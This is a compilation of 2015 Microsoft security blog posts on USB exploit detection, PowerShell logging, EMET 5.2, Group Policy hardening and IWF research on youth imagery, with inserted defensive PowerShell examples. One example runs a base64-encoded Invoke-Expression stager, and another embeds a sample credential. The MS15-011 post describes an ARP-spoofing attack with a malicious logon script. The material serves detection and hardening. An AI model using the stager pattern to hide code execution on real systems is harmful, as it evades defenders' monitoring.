All defenses carry some cost that dictates how easy they are to build and to integrate into the platform or applications. This means we must take into account the engineering cost of building the defense, and we must assess the taxes inflicted on developers and system operators when they make use of the defense in practice. For example, defenses that require developers to make code changes, or system operators to manage complex configurations, are less desirable. Defenses with low engineering cost and minimal friction to enable are likely to rate higher in our assessment.


The criteria above are intended to provide some transparency and insight into the guidelines we use when evaluating the properties of a defense, both internally at Microsoft and for the Microsoft Defense Bounty program. It’s certainly the case that we set a high bar for what we expect from a defensive solution, but we believe we have good reasons for doing so, grounded both in the modern threat landscape and in our customers’ expectations.

We strongly encourage anyone with a passion for software security to move “beyond the bugs” and explore opportunities to invest time and energy into developing novel defenses. Aside from being a challenging and stimulating problem space, there is now also the potential to receive up to $100,000 USD for your efforts in this direction through the Microsoft Defense Bounty program. The impact that these defenses can have on reducing the risk associated with software vulnerabilities and helping keep people safe is huge.

Matt Miller

Microsoft Security Response Center


Defending against CVE-2015-1769: a logical issue exploited via a malicious USB stick, 11 Aug 2015 15:37:20 +0000

Today Microsoft released update MS15-085 to address CVE-2015-1769, an important severity security issue in Mount Manager. It affects both client and server versions, from Windows Vista to Windows 10.

This blog post provides detection guidance to help defenders spot attempts to exploit this issue.


Detection Guidance

As part of the update, we are also shipping a new event log entry to help defenders detect attempts to use this vulnerability on their systems. The event is raised every time a malicious USB device that relies on this vulnerability is mounted on the system. If such an event is recorded, it means the attempt to exploit the vulnerability was blocked. So once the update is installed, companies that audit event logs can use this as a detection mechanism.

These events are logged in the System channel and reported at the Error level.

Note: Multiple events may be raised for single exploit attempt.

After installing the update, exploitation attempts generate Event ID 100 with MountMgr or Microsoft-Windows-MountMgr as its source. The CVE associated with this vulnerability is also logged for reference. Note that this error code can also be logged in other, extremely rare circumstances; so while there is a very small chance that this event could be generated in a non-malicious scenario, an exploitation attempt is by far the most likely cause.
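The following PowerShell function is an added example of turning that guidance into a query; it is not from the MSRC post. It pulls Event ID 100 from the System log using both source names given above, restricted to the Error level, and tags each hit with whether the message text names the CVE. The host list, the seven-day window and the grouping in the usage lines are assumptions for the example.

```powershell
# Added example: collect CVE-2015-1769 exploitation-attempt events (MS15-085 detection
# guidance: System log, Event ID 100, source MountMgr / Microsoft-Windows-MountMgr, Error level).
# Requires the MS15-085 update on the queried hosts; without it the event never fires.
function Get-MountMgrExploitAttempt {
    [CmdletBinding()]
    param(
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [datetime]$StartTime    = (Get-Date).AddDays(-7)   # 7-day window is an assumption
    )
    foreach ($computer in $ComputerName) {
        $filter = @{
            LogName      = 'System'
            ProviderName = 'MountMgr', 'Microsoft-Windows-MountMgr'   # both source names from the advisory
            Id           = 100
            Level        = 2                                           # 2 = Error
            StartTime    = $StartTime
        }
        try {
            Get-WinEvent -ComputerName $computer -FilterHashtable $filter -ErrorAction Stop |
                ForEach-Object {
                    [PSCustomObject]@{
                        Computer    = $computer
                        TimeCreated = $_.TimeCreated
                        Provider    = $_.ProviderName
                        MentionsCve = ($_.Message -match 'CVE-2015-1769')
                        Message     = $_.Message
                    }
                }
        }
        catch {
            # Get-WinEvent raises an error when nothing matches; for this query that is the clean result.
            if ($_.Exception.Message -notmatch 'No events were found') {
                Write-Warning "$computer`: $($_.Exception.Message)"
            }
        }
    }
}

# Usage (constructed): sweep a host list, then collapse the several events a single
# mount can raise into one row per host and minute.
# Get-MountMgrExploitAttempt -ComputerName (Get-Content .\hosts.txt) |
#     Group-Object Computer, { $_.TimeCreated.ToString('yyyy-MM-dd HH:mm') } |
#     Select-Object Name, Count
```

Because one exploit attempt can raise multiple events, alert on the grouped rows rather than on the raw count, and treat a hit as an attempt that was blocked: the interesting follow-up is which device was plugged in and by whom, not whether the host is compromised by this vulnerability.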

– Axel Souchet, Vishal Chauhan from MSRC Vulnerabilities and Mitigations Team

Advances in Scripting Security and Protection in Windows 10 and PowerShell V5, 10 Jun 2015 11:25:59 +0000 Over the last several releases of Windows, we’ve been working hard to make the platform much more powerful for administrators, developers, and power users alike. PowerShell is an incredibly useful and powerful language for managing Windows domains. Unfortunately, attackers can take advantage of these same properties when performing “post-exploitation” activities (actions performed after a system has been compromised).

The PowerShell team, recognizing this, has significantly advanced security-focused logging and detection in Windows 10 and PowerShell v5. Some capabilities take advantage of new functionality in Windows 10, others are available on Windows 8.1 and Windows Server 2012 R2 with KB3000850, and the functionality that is specific to PowerShell v5 will be available on Windows 7 and Windows Server 2008 R2 when the next version of the Windows Management Framework is released.

Scripting transparency for Antimalware engines

Antimalware engines traditionally focus the majority of their attention on files that applications (or the system) open. Scripts have historically been difficult for antimalware engines to evaluate because scripts can be so easily obfuscated. Unless the antimalware engine can emulate the particular scripting language, it will not be able to deobfuscate the script to view the actual payload.

A new Windows 10 feature, the Antimalware Scan Interface (AMSI), lets applications become active participants in malware defense. Applications can now request antimalware evaluation of any content – not just files on disk. This gives script engines (and other applications) the ability to request evaluation of deobfuscated scripts and to request evaluation of content entered directly in to the console.

For more information about the Antimalware Scan Interface, see


PowerShell Logging Improvements

Given the incredible power of PowerShell’s shell and scripting language, we’ve made major advancements in PowerShell’s transparency for PowerShell v5:

Improved over-the-shoulder transcription

Previous versions of PowerShell provided the ability to transcribe sessions. Unfortunately, transcripting was not globally configurable, could easily be disabled, and only worked in the interactive PowerShell console. As a result, transcripting was not very practical for detecting malicious activity.

For PowerShell v5 and Windows 8.1/2012R2 with KB3000850, the following changes have been made for transcripting:

  • Can now be configured as a system-wide group policy
  • Provides better information about the session than the previous transcription functionality
  • Transcription works in both non-interactive and interactive PowerShell sessions

Deep script block logging

Previous versions of PowerShell provided “pipeline logging”, a mechanism to log all commands invoked (with the parameters). The way this information was logged made it difficult to use for security auditing and detection. In PowerShell v5 and Windows 8.1/2012R2 with KB3000850, PowerShell gains a new security focused logging mechanism called “Script Block Logging”.

A “script block” is the base unit of executable code in PowerShell. Even when a script is obfuscated, it must eventually be transformed from an obfuscated script block back into a deobfuscated script block containing its malicious payload.

PowerShell now provides the option to log all script blocks to the event log prior to executing them. In the case of obfuscated scripts, both the obfuscated and deobfuscated script blocks will end up being logged. This gives defenders the ability to see exactly what PowerShell code is being run on their systems.
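As an added example (not code from the post or the PowerShell team), the script below enables both features described above, system-wide transcription and script block logging, through the policy registry keys that the corresponding Group Policy settings write, then runs a base64-wrapped payload and shows that the decoded text lands in the log. The transcript share and the payload text are assumptions; the registry value names and the event ID 4104 are the documented PowerShell v5 locations rather than something stated on this page.

```powershell
# Added example: enable PowerShell v5 transcription and script block logging, then
# confirm an obfuscated payload is logged in its decoded form.
# Run elevated on Windows 10, or on 8.1 / 2012 R2 with KB3000850.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# 1. System-wide transcription: covers every host (console, ISE, remoting, scheduled tasks).
#    The invocation header timestamps each command. Make the share write-only for
#    workstations so a compromised host cannot read or edit earlier transcripts.
New-Item -Path "$policy\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$policy\Transcription" -Name EnableTranscripting    -Value 1 -Type DWord
Set-ItemProperty -Path "$policy\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$policy\Transcription" -Name OutputDirectory -Value '\\logserver\transcripts$' -Type String   # assumed share

# 2. Script block logging: every block is written to
#    Microsoft-Windows-PowerShell/Operational (event 4104) before it executes.
New-Item -Path "$policy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$policy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# --- start a fresh PowerShell session here so the new policy is picked up ---

# 3. Run a payload the way a downloader stub would: Invoke-Expression is only ever
#    handed base64, which is all a file-based scanner would see.
$payload = 'Write-Output "decoded payload ran on $env:COMPUTERNAME"'          # constructed payload
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$stager  = "Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$encoded')))"
Invoke-Expression $stager

# 4. Both layers are in the log: the stager block (carrying the base64 blob) and the
#    decoded payload block. In a 4104 event, Properties[2] is the ScriptBlockText field.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 100 |
    ForEach-Object { $_.Properties[2].Value } |
    Where-Object { $_ -match [regex]::Escape($encoded) -or $_ -match [regex]::Escape($payload) }
```

The last pipeline returns the stager text and the decoded payload text (plus the block that contained the `$payload` assignment itself, if that was logged). The point for detection engineering is that the decoded block is what you write rules against: the base64 changes with every packing, the `Write-Output`/`Invoke-Expression` body underneath it does not.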

Protected Event Logging

One concern when you increase logging on a machine is that the information you’ve logged may contain sensitive data. If an attacker compromises that machine, this sensitive information in the event log may be a gold mine of credentials, confidential systems, and more. To help address this concern, we’ve added Protected Event Logging to Windows 10, which lets participating applications encrypt sensitive data as they write it to the event log. You can then decrypt and process these logs once you’ve moved them to a more secure and centralized log collector.

Miscellaneous Security Improvements

Additional security features added to PowerShell v5 include:

  • Encryption and decryption cmdlets using the Cryptographic Message Syntax (CMS) standard
  • Secure code generation APIs for developers
  • “Constrained PowerShell” for systems that implement AppLocker policies
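The Protected Event Logging section above and the CMS cmdlets in this list are two ends of the same mechanism, so one added example (not code from the post) covers both. A Document Encryption certificate is created on the log collector, endpoints receive only its public half and use it, directly through Protect-CmsMessage and indirectly through the Protected Event Logging policy, and the collector alone can decrypt. The certificate subject, file paths, the sample secret and the registry value type are assumptions; the cmdlets and the policy key are the documented Windows 10 / PowerShell v5 interfaces.

```powershell
# Added example: PowerShell v5 CMS cmdlets plus Windows 10 Protected Event Logging.
# Sections 1 and 3 run on the log collector, section 2 on an endpoint.
# Needs the Windows 10 / Server 2016 PKI module for New-SelfSignedCertificate's -TextExtension.

# --- 1. Collector: create the key pair. EKU 1.3.6.1.4.1.311.80.1 is Document Encryption,
#        which Protect-CmsMessage requires on the recipient certificate.
$cert = New-SelfSignedCertificate -Subject 'CN=Protected Event Logging' `
            -CertStoreLocation Cert:\CurrentUser\My `
            -KeyUsage KeyEncipherment, DataEncipherment `
            -TextExtension @('2.5.29.37={text}1.3.6.1.4.1.311.80.1')
Export-Certificate -Cert $cert -FilePath C:\temp\pel-public.cer | Out-Null   # public half only

# --- 2. Endpoint: only the public certificate is present here, so nothing on this
#        host can decrypt what it writes.
Import-Certificate -FilePath C:\temp\pel-public.cer -CertStoreLocation Cert:\LocalMachine\My | Out-Null
$secret   = 'net use \\fileserver\share /user:CORP\svc-backup Hunter2!'     # constructed secret
$envelope = Protect-CmsMessage -To C:\temp\pel-public.cer -Content $secret
$envelope                                  # -----BEGIN CMS----- ...base64... -----END CMS-----

# Point Protected Event Logging at the same certificate. These are the values the
# "Enable Protected Event Logging" Group Policy setting writes; from then on, script
# block logging encrypts the ScriptBlockText of every 4104 event with this key.
$pel = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging'
New-Item -Path $pel -Force | Out-Null
Set-ItemProperty -Path $pel -Name EnableProtectedEventLogging -Value 1 -Type DWord
Set-ItemProperty -Path $pel -Name EncryptionCertificate -Value $cert.Thumbprint -Type MultiString  # MultiString assumed

# --- 3. Collector (private key in CurrentUser\My): decrypt the hand-made envelope and
#        the protected script block events forwarded from endpoints.
Unprotect-CmsMessage -Content $envelope    # -> the original $secret
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 50 |
    Unprotect-CmsMessage                   # EventLogRecord input: decrypts the protected field
```

The thumbprint form of EncryptionCertificate requires the public certificate to be importable on every endpoint (step 2 does that); the policy also accepts the base64 certificate content or a file path. Keep the private key off the endpoints entirely: the whole value of the feature is that a host compromise yields CMS envelopes, not credentials.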


For more information about PowerShell’s transparency improvements, Protected Event Logging, and other PowerShell security improvements, see



Joe Bialek (MSRC Engineering), Lee Holmes (PowerShell)

Experts: Don’t blame the victims of youth ‘selfies’, 17 Mar 2015 19:32:52 +0000 It’s a mistake to blame young people who take sexually explicit photos or videos of themselves when those images end up being redistributed over the Internet, according to experts who gathered in London this week to discuss a new study by the U.K.-based Internet Watch Foundation (IWF).

It’s also a mistake to assume that the images, sometimes referred to as “selfies,” were taken voluntarily by the children who appear in them.

Researchers analyzed sexually explicit pictures taken and supposedly shared by young people, and found that 89.9 percent of the images had been “harvested” from their original upload location and posted to other public sites. Moreover, 100 percent of the images the IWF analyzed depicting children 15 and younger were harvested and posted somewhere else.

The IWF study, which was conducted late last year and funded by Microsoft, analyzed 3,803 photos and videos that were believed to be of children and youth ranging from infants to 20 years old.

“What the IWF went to seek and what they found are quite different,” said Tink Palmer, Chief Executive Officer of the Marie Collins Foundation and moderator of a panel discussion about the emotional and behavioral aspects of producing such images. “We need to focus on definitions and understand that every picture tells a story about what’s happening to the children.”

Microsoft funded the IWF to repeat and expand similar research done three years ago. IWF’s 2012 study found that of the 12,000-plus images taken and shared by youth and examined by the IWF, 88.15 percent had migrated to “parasite websites” where people sometimes paid to download them. As part of our child online protection strategy, Microsoft was interested in learning whether the 2012 trend was continuing, and whether there was more to be gleaned regarding the content’s commercial availability.

What the IWF learned from the new study, however, was very different. The 2014 set of supposed selfies featured much younger children, thus making it all but impossible to refer to the images as “self-produced.” Indeed, experts agreed the latest content could be divided into three categories: (1) truly self-generated, (2) by-products of online “grooming,” and (3) results of outright coercion or “sextortion.”

“With the under 10 (year olds), we have to believe something coercive is going on,” said Professor Sonia Livingstone of the Department of Media and Communications at the London School of Economics. “It’s just another way that an already at-risk group is being further victimized.”

IWF was unable to ascertain (nor was such a determination in scope) the category into which each image might fall. The latest results are shocking and disturbing because of the younger-aged children and the heightened explicit sexual nature of the acts. In 2012, not a single image included a child believed to be 13 or younger, IWF said.

The London event, co-hosted by IWF and Microsoft, featured a second panel where experts discussed guidance for parents and educators, as well as ongoing technological efforts. The group offered advice for parents about webcams and how they operate, noting they’re no longer “a device that balances on top of a computer monitor.” They also called out simple messages for children, including “privates are private” and “speak up and tell someone” if something or someone makes them uncomfortable online or elsewhere. The event brought together 100 policymakers, child safety advocates, technology industry representatives and others to discuss the findings and to begin to chart a way forward.

All agreed the research indicated that different analyses and potential mitigation paths were required for the images involving older children versus those featuring children under 13. IWF agreed. “It is indisputable that coercion of young people to produce and/or share sexual content online must be referred to as a form of child sexual abuse,” said Sarah Smith, IWF’s lead researcher on the project. The content produced by the older age groups, meanwhile, could be regarded as more traditional “sexting.”

For our part, Microsoft will seek to create and deploy appropriate technology to help address the issue. In fact, as part of the U.K. government’s #WePROTECT Children Online initiative, Microsoft is leading a technology project about self-generated indecent images among youth. In addition, we will continue to raise awareness, help educate the public, and continue to partner with organizations like the IWF to ensure strategies and proposed “solutions” are research-based. Microsoft has agreed to again sponsor similar research by the IWF this year.

To read Part 1 of this two-part blog, which focuses on the study results and some Microsoft suggested guidance for parents, click here. To learn more about staying safer online generally, see this website.





EMET 5.2 is available (update), 16 Mar 2015 12:57:00 +0000 Today, we’re releasing the Enhanced Mitigation Experience Toolkit (EMET) 5.2, which includes increased security protections to improve your security posture. You can download EMET 5.2 from or directly from here.

Following is the list of the main changes and improvements:

  • Control Flow Guard: EMET’s native DLLs have been compiled with Control Flow Guard (CFG). CFG is a new feature introduced in Visual Studio 2015 (and supported by Windows 8.1 and Windows 10) that helps detect and stop attempts to hijack control flow. EMET’s native DLLs (i.e. EMET.DLL) are injected into every application process EMET protects. Since we strongly encourage third-party developers to recompile their applications to take advantage of this latest security technology, we have compiled EMET itself with CFG. More information on CFG is available in this Visual C++ Team blog entry.
  • VBScript in Attack Surface Reduction: the configuration for the Attack Surface Reduction (ASR) mitigation has been improved to stop attempts to run the VBScript extension when loaded in Internet Explorer’s Internet Zone. This mitigates the exploitation technique known as “VBScript God Mode” observed in recent attacks.
  • Enhanced Protected Mode/Modern IE: EMET now fully supports alerting and reporting from Modern Internet Explorer, and from Desktop IE with Enhanced Protected Mode enabled.
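The CFG description earlier on this page and the note above that EMET’s own DLLs are now compiled with CFG both raise the same practical question: how do you tell whether a given binary (EMET.DLL, or a third-party module you are deciding whether EMET still needs to cover) was actually linked with CFG? The following PowerShell function is an added example, not code from the EMET team. It reads the DllCharacteristics field of the PE optional header, the field that dumpbin /headers prints, and reports the mitigation flags the linker recorded. The EMET install path in the usage lines is an assumption.

```powershell
# Added example: report the mitigation flags recorded in a PE file's DllCharacteristics
# (ASLR, DEP, SafeSEH-related NO_SEH, and Control Flow Guard). Pure byte parsing, no
# dumpbin needed; works on Windows PowerShell with .NET Framework.
function Get-PeMitigationFlags {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)

    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).ProviderPath)
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        throw "$Path does not start with an MZ header"
    }
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)                 # IMAGE_DOS_HEADER.e_lfanew
    if ($peOffset -le 0 -or $peOffset + 4 + 20 + 72 -gt $bytes.Length -or
        [BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) {  # "PE\0\0" little-endian
        throw "$Path has no valid PE signature"
    }
    $optHeader = $peOffset + 4 + 20                                    # skip signature + IMAGE_FILE_HEADER
    $magic     = [BitConverter]::ToUInt16($bytes, $optHeader)
    $format    = switch ($magic) { 0x10B { 'PE32' } 0x20B { 'PE32+' } default { 'unknown' } }
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
    $dllChars  = [BitConverter]::ToUInt16($bytes, $optHeader + 70)

    [PSCustomObject]@{
        Path          = $Path
        Format        = $format
        DynamicBase   = [bool]($dllChars -band 0x0040)   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR)
        HighEntropyVA = [bool]($dllChars -band 0x0020)   # 64-bit high-entropy ASLR
        NxCompat      = [bool]($dllChars -band 0x0100)   # DEP-compatible
        NoSeh         = [bool]($dllChars -band 0x0400)   # image declares no SEH handlers
        GuardCF       = [bool]($dllChars -band 0x4000)   # IMAGE_DLLCHARACTERISTICS_GUARD_CF
        Raw           = ('0x{0:X4}' -f $dllChars)
    }
}

# Usage (paths assumed): check EMET's injected DLL, then list every module under a
# vendor directory that was NOT built with CFG, i.e. the ones EMET's anti-ROP
# mitigations are still covering for.
# Get-PeMitigationFlags 'C:\Program Files (x86)\EMET 5.5\EMET64.dll'
# Get-ChildItem 'C:\Program Files\SomeVendor' -Include *.dll, *.exe -Recurse |
#     ForEach-Object { Get-PeMitigationFlags $_.FullName } |
#     Where-Object { -not $_.GuardCF } |
#     Format-Table Path, Format, DynamicBase, NxCompat, GuardCF
```

A set GuardCF bit means the linker emitted the CFG bitmap and call-site checks; enforcement still depends on running on a CFG-aware Windows (8.1 or 10, as noted above) and on the loader, so the flag is evidence of how the binary was built, not of what a given host does with it.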

Your feedback is always welcome, as it helps us improve EMET. Feel free to reach out to us by sending an email to

3/16/2015 UPDATE: We have received reports of certain customers experiencing issues with EMET 5.2 in conjunction with Internet Explorer 11 on Windows 8.1. We recommend that customers who downloaded EMET 5.2 before March 16th, 2015 download it again via the link below, and uninstall the previous EMET 5.2 before installing the new one.

– The EMET Team

Part 1: New data on youth “nudes” show disturbing trend, 10 Mar 2015 16:39:31 +0000 Young people around the globe are taking and sharing nude photos and videos of themselves, and the phenomenon appears to be occurring among younger and younger age groups, according to results from a new study sponsored by Microsoft.

Data released today by the UK-based Internet Watch Foundation (IWF) show 17.5 percent of the more than 3,800 sexually explicit photos and videos analyzed by IWF late last year were produced by young people believed to be under the age of 15. Meanwhile, 7.5 percent, or 286 images, were assessed as featuring children 10 or younger.

Even more startling is the severity of the content. The majority (72.4 percent) of the images depicting individuals believed to be 16-20 years old was classified as “Category C,”[1] with 27.6 percent deemed “Category B or A.” In sharp contrast, 46.9 percent of the images analyzed as featuring children 15 and under constituted Category A and B.

“The findings tell a distinctively different story from the research conducted in 2012,” said IWF Chief Executive Officer Susie Hargreaves. “However, our message around the ease at which content can be ‘lost’ online remains the same. Ninety percent of the imagery had been taken from its original upload location and copied to somewhere else. Whilst the 2012 study provided valuable insight into the increasing accessibility of sexual content depicting young people, this research reveals younger children and in some cases more explicit sexual behavior than we previously saw.”

Indeed, 85.9 percent of the images and videos assessed as depicting youth under 15 were taken via webcam captures from a personal computer or laptop. Just 8.5 percent were taken with a mobile phone, challenging the belief that the majority of “sexting” photos are captured via cell phone. IWF reported that, among this age group, 1.8 percent of the images were shot with a traditional digital camera.

I first learned of IWF’s work analyzing “indecent self-generated imagery among youth” some 18 months ago when Microsoft was refreshing its child online protection strategy. As noted, IWF had conducted a similar study in 2012 when it reviewed more than 12,000 nude images and videos taken and shared by youth. Those results showed that 88.15 percent of the content had migrated to so-called “parasite websites” where people downloaded the images, sometimes for a fee, and in all instances probably unbeknownst to the original explicit selfie-taker. IWF stresses there was “not a single instance” three years ago where a child was assessed as being 13 years of age or younger.

We approached IWF to see if the research had been repeated or was set to be re-run. An opportunity for collaboration emerged and the current research’s photos and images were analyzed over September, October and November 2014. We asked, in particular, that IWF examine the commercial aspects of the data given the 2012 results. A piece of “good news” from the current study is that only 1.7 percent of the 2014 data-set was assessed as being “commercially available.”

Parents who may be aware of this pattern of youth behavior are often confused by it. Others are hard-pressed to believe their kids would take part. To get some perspective, we’ve produced a new factsheet and offer some general guidance:

  • Talk to kids. Ask what they do online—favorite sites, games and activities. Be inquisitive, not judgmental. Let what’s learned serve as a basis for “house rules” on technology and web use.
  • Get help from technology. Family safety settings can help block harmful content, limit information-sharing and manage website access. Tell your children if you use these features and explain they’re intended to help keep them safe.
  • Discuss sexting—even if it’s uncomfortable. Start conversations early, and talk about peer pressure to sext. Listen for signs of coercion. Discuss risks and keep perspective.

To launch the research, Microsoft and IWF are co-hosting an event today at our London offices. “Youth selfies: The real picture – New insights and a way forward,” is bringing together parents, educators, policymakers and others to hear the data and discuss possible tools and resources. In Part 2 of this two-part blog, I’ll recap the event, perspectives shared and advice given. Meantime, to learn more about online safety generally, please visit this website.

[1] IWF’s category classifications are set out in the UK Sentencing Council’s Sexual Offences Definitive Guideline. Category C is defined as no sexual activity, but a prominent focus on the naked genitalia of the individuals shown. Category B includes sexual activity shy of any actual sex act, while Category A includes sex acts and other highly graphic sexual displays.

Safer Internet Day 2015: This year, “Do 1 (More) Thing” to stay safer online, 10 Feb 2015 17:39:12 +0000 One year ago today, Microsoft asked people across the globe to #Do1Thing to stay safer and more secure online by taking what may have been a first step toward safeguarding their digital lifestyles. Today, on Safer Internet Day 2015, we want everyone to add to last year’s pledges and #Do1MoreThing to become cyber savvy. In addition, we’re launching new interactive resources for young people on the Microsoft YouthSpark Hub to further encourage safer online habits and practices.

Our goal is to help educate, engage and inspire people to better protect themselves and others online –all rooted firmly in the spirit of the Safer Internet Day 2015 theme: “Let’s create a better Internet together.” The hope is that each person’s one (more) thing will become a long-lasting best practice that will be shared with others and, in turn, lead to an ever-increasing number of safer online behaviors. Research shows that such effects can help create safer online experiences for every individual and a more secure online ecosystem for all.

Last year, some of the most popular “1 Thing” pledges included positive practices such as always using a four-digit PIN (personal identification number) to lock mobile devices; promises to convert to and use “strong” passwords for all devices and accounts; and trying to refrain from constant phone-checking and instead “be present” in personal interactions. This year, visitors to the new online safety section of the Microsoft YouthSpark Hub may be further inspired by other online safety tips and ideas as well. One of my favorite parts of the new website is the opening section, designed to pull young people into the site, calling on them to: “Be awesome in real life and online.” From there, youth can explore comic strips, respond to polls and quizzes, and learn interesting facts and figures.

In addition, Microsoft is proud to again help sponsor the official U.S. Safer Internet Day 2015 event being held today in California. Managed by, “Safer Internet Day 2015: Actions & Activism Toward a Better Net and World” is bringing together youth leaders, educators, policymakers, parents, Internet safety experts and representatives from the technology industry to focus not just on problems, but also on solutions for building a safer and better Internet.

When asked about this year’s theme, Larry Magid, co-director of said Safer Internet Day’s “Let’s create a better Internet together” theme “reminds us that online and mobile safety are much more than just the absence of danger, but the presence of positive actions to improve not just the Internet but the world at large. It’s also a recognition that we’re in this together. Everyone— kids, parents, young adults, seniors, corporations, organizations and governments—has a stake and a role to play in making the Internet an even better tool for empowering the world’s citizens.”

Building on its near 20-year history in online safety, Microsoft remains committed to doing its part to help grow and shape a better and safer Internet for youth and, indeed, everyone.

For more information about staying safer and more secure online, I invite you to visit this site.

MS15-011 & MS15-014: Hardening Group Policy, 10 Feb 2015 10:50:00 +0000 We are releasing MS15-011 & MS15-014, which harden Group Policy and address network access vulnerabilities that can be used to achieve remote code execution (RCE) in domain networks. The MS15-014 update addresses an issue in Group Policy update which can be used to disable client-side global SMB Signing requirements, bypassing an existing security feature built into the product. MS15-011 adds new functionality, hardening network file access to block access to untrusted, attacker-controlled shares when Group Policy refreshes on client machines. These two updates are important improvements that will help safeguard your domain network.

What’s the risk, i.e., what’s the attack scenario?

Let’s look at one of the typical attack scenarios as outlined in the diagram below.

This is an example of a ‘coffee shop’ attack scenario, where an attacker would attempt to make changes to a shared network switch in a public place and can direct the client traffic to an attacker-controlled system.

  1. In this scenario, the attacker has observed traffic across the switch and found that a specific machine is attempting to download a file located at the UNC path: \\\Share\Login.bat .

  2. On the attacker machine, a share is set up that exactly matches the UNC path of the file requested by the victim: \\*\Share\Login.bat.

    1. The attacker will have crafted the contents of Login.bat to execute arbitrary, malicious code on the target system. Depending on the service requesting Login.bat, this could be executed as the local user or as the SYSTEM account on the victim’s machine.

  3. The attacker then modifies the ARP table in the local switch to ensure that traffic intended for the target server is now routed through to the attacker’s machine.

  4. When the victim’s machine next requests the file, the attacker’s machine will return the malicious version of Login.bat.

    This scenario also illustrates that this attack cannot be used broadly across the internet – an attacker needs to target a specific system or group of systems that request files with this unique UNC path.

What were the Group Policy vulnerabilities?

An RCE vulnerability existed in how Group Policy received and applied policy data when connecting to a domain. Concurrently, a vulnerability existed whereby Group Policy could fail to retrieve valid security policy and instead apply a default, potentially less secure, group policy. This could, in turn, be used to disable the domain enforced SMB Signing policy.

What did we fix under MS15-014?

The risk of circumventing SMB Signing was fixed by correcting how Group Policy behaves when it fails to retrieve a current, valid security policy. After applying the fix, Group Policy will no longer fall back to defaults and will instead use the last known good policy if a security policy retrieval fails.

What did we harden under MS15-011?

While SMB Signing safeguards against Man-In-The-Middle attacks, with vulnerabilities like the above in Group Policy it is possible to disable it. More importantly, the SMB Client doesn’t require SMB Signing by default, so it is possible to direct domain-related traffic, especially the unencrypted traffic, to attacker-controlled machines and serve malicious content to the victims in response. To block this kind of attack we added the ability to harden UNC path access within the domain network.

Universal Naming Convention (UNC) is a standardized notation that Windows uses to access file resources; in most cases these resources are located on a remote server. UNC allows the system to access files using the standard path format: \\<hostname>\<sharename>\<objectname>, for example, \\\fileshare\passwords.txt, without requiring the application or user to understand the underlying transport technology used to provide access to the file. In this way, the UNC client in Windows abstracts network file technologies, such as SMB and WebDAV, behind a familiar file path syntax. UNC paths are used in Windows in everything from printers to file shares, providing an attacker a broad surface to explore and attack. To properly address this weakness in UNC, we had to improve UNC to allow a server to authenticate itself to a client, thereby allowing the client machine to trust the content coming from the target system and be protected from malicious file shares.

How did we harden it?

When an application or service attempts to access a file on a UNC path, the Multiple UNC Provider (MUP) is responsible for enumerating all installed UNC Providers and selecting one of them to satisfy all I/O requests for the specified UNC path. On a typical Windows client installation, MUP would try the Server Message Block (SMB) protocol first, but if the SMB UNC Provider is unable to establish an SMB connection to the server, then MUP would try the next UNC Provider and so on until one of them is able to establish a connection (or there are no remaining UNC providers, in which case the request would fail).

In most scenarios, the security of the server is paramount: the server stores sensitive data, so file transfer protocols are designed in such a way that the server validates the client’s identity and performs appropriate access checks before allowing the client to read from or write to files. The trust boundary when Group Policy applies computer and/or user policies is completely reversed: the sensitive data is the client’s configuration, and the remote server has the capability of changing the client’s configuration via transmission of policy files and/or scripts. When Group Policy is retrieving data from the policy server, it is important that the client performs security checks to validate the server’s identity and prevent data tampering between the client and the server (in addition to the normal security checks performed by the server to validate the client’s credentials). It is also important that MUP only sends requests for Group Policy files to UNC Providers that support these client-side checks, so as to prevent the checks from being bypassed when the SMB UNC provider is unable to establish a connection to the server.

Group Policy isn’t necessarily the only service for which these extra client-side security checks are important. Any application or service that retrieves configuration data from a UNC path, and/or automatically runs programs or scripts located on UNC paths, could benefit from these additional security checks. As such, we’ve added a new feature, UNC Hardened Access, along with a corresponding Group Policy setting through which MUP can be configured to require additional security properties when accessing configured UNC paths.

When UNC Hardened Access is configured, MUP starts handling UNC path requests in a slightly different manner: 

Each time MUP receives a request to create or open a file on a UNC path, it evaluates the current UNC Hardened Access Group Policy settings to determine which security properties are required for the requested UNC path. The result of this evaluation is utilized for two purposes: 

  1. MUP only considers UNC Providers that have indicated support for all of the required security properties. Any UNC Providers that do not support all of the security properties required via the UNC Hardened Access configuration for the requested UNC path will simply be skipped.

  2. Once a UNC Provider is selected by MUP, the required security properties are passed to that UNC Provider via an Extra Create Parameter (ECP). UNC Providers that opt-in to UNC Hardened Access must respect the required security properties indicated in the ECP; if the selected UNC Provider is unable to establish a connection to the server in a manner that satisfies these requirements (e.g. due to lack of server support), then the selected UNC Provider must fail the request.

Even 3rd party applications and services can take advantage of this new feature without additional code changes; simply add the necessary configuration details in Group Policy. If a UNC Provider is able to establish a connection to the specified server that meets the required security properties, then the application/service will be able to open handles as normal; if not, opening handles would fail, thus preventing insecure access to the remote server.

Please refer to for details on configuring the UNC Hardened Access feature.

Consider the following scenario:

  • Contoso maintains an Active Directory domain named with two Domain Controllers (DCs) named and

  • A laptop is joined to the aforementioned domain.

  • Group Policy is configured to apply a Group Policy Object (GPO) to the laptop that configures UNC Hardened Access for the paths \\*\NETLOGON and \\*\SYSVOL such that all access to these paths require both Mutual Authentication and Integrity.
